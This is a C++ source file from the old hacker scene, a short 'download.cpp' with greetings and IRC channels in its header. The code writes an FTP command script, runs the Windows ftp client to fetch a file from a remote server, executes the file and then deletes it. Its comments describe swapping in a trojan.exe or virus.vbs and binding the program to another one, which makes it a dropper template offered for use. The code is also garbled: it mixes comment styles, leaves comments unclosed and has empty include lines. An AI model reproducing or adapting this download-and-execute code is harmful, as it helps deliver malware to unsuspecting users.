// download.cpp by d3xt4r // contact me: orange_remote@mailandnews.com // or on irc.dal.net #alienworkshop #hackerzlair // alright anyone with a half a brain knows what this does. modify the code. download something. // execute it. delete it. bind it to another program. dont do anything illegal with it. // if this dosent work on your o/s modifythe first line so that there is no c://. win2k/nt. // thanx/hi to; // vIsIt0r for... well nothing really... // t3rminal aka lifter, for sticking with me no matter how crazy things got. ph33r the bed. // pROcon. for starting the hackerzlair and for letting me be a part of it for a short time . // pr00f.... the code... other stuff // evilrabbit, for providing countless minutes of entertainment // short hello to: ladyinBLK, StirFryPork, LordMaetrics, di1122, Edgemaster, EarthShaman, The_Guru, FuUtA, SiriS, syn|ack, phaxx, HardWired, Micoria, // kewlmaniac, and The_Prophet. #include #include void main() { ofstream fout("c:\\ftpstruc"); /*creats the directions for the ftp client to follow fout << "open\n"; /* opens the ftp server fout << "ftp.cdrom.com\n"; /* the server address fout << "anonymous\n"; /* user name for the server in this case willl login as anonymous fout << "somemail@someserver.com\n"; #bogus password we will use fout << "cd etc\n"; #the folder that our file is in fout << "get msg.toomany\n"; #the file we will use... easy to replace with trojan.exe ... virus.vbs ... you get the point fout << "close\n"; #close the connection to the server fout << "quit\n"; #quit the client fout.close(); #ends the file system("ftp -s:c://ftpstruc"); #we start the ftp client with the instructions to use the directions in the file ftpstruc system("TYPE msg.toomany"); /* we execute the file in this case read it from the console... in the event of a vbs file or an executible or whatever we just system("filename.ext") */ system("del msg.toomany"); }